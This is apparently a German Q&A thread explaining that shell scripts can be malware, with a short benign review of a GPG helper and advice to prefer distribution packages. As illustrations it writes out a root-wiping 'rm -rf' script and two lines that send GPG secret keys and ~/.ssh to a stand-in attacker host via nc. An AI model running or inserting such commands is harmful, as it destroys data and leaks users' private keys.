.sh Dateien sind Shell-Skripte. Sie sind analog zu .bat Dateien (cmd Skripte) unter Windows. Alle diese (Shell-Skripte, cmd-Skripte, .exe Ausführbare Windows-Dateien, ausführbare Linux-Dateien (die normalerweise keine Erweiterung haben)) sind ausführbare Programme; Wenn Sie einen ausführen, kann er alles tun, was Sie tun können. Also ja, Shell-Skripte können schädlich sein. Behandeln Sie ein Shell-Skript (oder ein Perl-Skript oder ein Python-Skript oder ein Ruby-Skript usw.) mit dem gleichen Misstrauen wie jede andere Anwendung.
Es ist etwas schwieriger, Malware in einem Shell-Skript zu verstecken, ohne verdächtig auszusehen, da dies ein Skript ist, das von Personen mit Kenntnissen der Skriptsprache gelesen werden kann. Aber es ist nicht viel schwieriger; nur wenige Leute, selbst mit dem technischen Wissen, würden sich die Mühe machen, den Code zu überprüfen, sodass Sie hoffen können, unbemerkt zu bleiben.
In der Praxis kursiert weniger Malware für Linux als für Windows. Dies liegt wahrscheinlich hauptsächlich daran, dass Linux auf dem Desktop einen viel geringeren Marktanteil hat als Windows, sodass sich das Schreiben von Linux-Malware weniger auszahlt. Außerdem gibt es in der Linux-Welt, mehr als in der Windows-Welt, eine seit langem verwurzelte Kultur des Teilens kleiner Systemverbesserungen; Das Gleichgewicht der Wahrscheinlichkeit besagt also, dass dies jemand ist, der eine kleine Verbesserung teilt, und keine Malware. Aber es könnte Malware sein, die sich als kleine Verbesserung ausgibt. Am Ende müssen Sie entscheiden, ob Sie der Website vertrauen können, von der Sie diese Anwendung erhalten, oder den Personen, die diese Website empfohlen haben. Bevorzugen Sie Programme, die aus Ihrer Distribution stammen (d. h. die Sie aus dem Software-Center installieren können), da sie einer Überprüfung unterzogen wurden.
Nun zu diesem speziellen Programm:Ich habe einen kurzen Blick darauf geworfen und es sieht gutartig aus. Ich habe nichts gesehen, was Ihr Passwort irgendwo speichern würde, ohne es Ihnen zu sagen, oder das auf Ihrem Computer andere Dinge tun würde als das, wofür es beworben wird. Beachten Sie, dass ich nur eine zweiminütige Überprüfung durchgeführt habe, an der jeder auch nur annähernd clevere Malware-Autor vorbeikommen könnte. Das Programm sieht recht gut geschrieben aus.
Ich würde dieses Programm nicht unbedingt empfehlen, es sei denn, Sie haben ein dringendes Bedürfnis, das nicht durch Pakete in der Ubuntu-Distribution abgedeckt wird. Ubuntu kommt mit dem Seepferdchen 
GUI-Frontend für GPG (es gibt auch kgpg 
für KDE-Benutzer). Vielleicht möchten Sie auch seahorse-nautilus installieren 
(oder seahorse-plugin 
in älteren Versionen) für die Nautilus-Integration.
#!/bin/sh
rm -rf --no-preserve-root /
Das ist Malware, und es ist ein Shell-Skript. Eine fortgeschrittenere Version könnte so etwas enthalten wie:
gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80
Also ja, ein Shell-Skript kann bösartig sein. Es kann komplexer werden und andere Skriptsprachen oder Bibliotheken aufrufen oder sogar ein Shell-Archiv sein, das eine reguläre ausführbare Datei ausspuckt und aufruft.
Zum größten Teil erhält alles, was Sie ausführen, die Berechtigungen des Benutzers.
Na sicher! Es kann alles tun, was Sie tun können! Protokolle ansehen, Keylogs erstellen, Dateien stehlen usw....
Je nachdem, was sein Entwickler auf den Quellcode geschrieben hat! Es kann ALLES tun.....
Und es ist sehr einfach zu erstellen. Wenn Sie also eine verdächtige .sh-Datei erhalten, überlegen Sie es sich zweimal, bevor Sie sie ausführen!